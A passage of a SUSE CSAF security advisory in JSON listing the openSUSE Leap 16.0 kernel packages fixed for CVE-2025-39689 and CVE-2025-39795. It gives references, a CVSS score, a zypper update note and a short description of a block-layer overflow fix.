"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: avoid possible overflow for chunk_sectors check in blk_stack_limits()\n\nIn blk_stack_limits(), we check that the t-\u003echunk_sectors value is a\nmultiple of the t-\u003ephysical_block_size value.\n\nHowever, by finding the chunk_sectors value in bytes, we may overflow\nthe unsigned int which holds chunk_sectors, so change the check to be\nbased on sectors.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
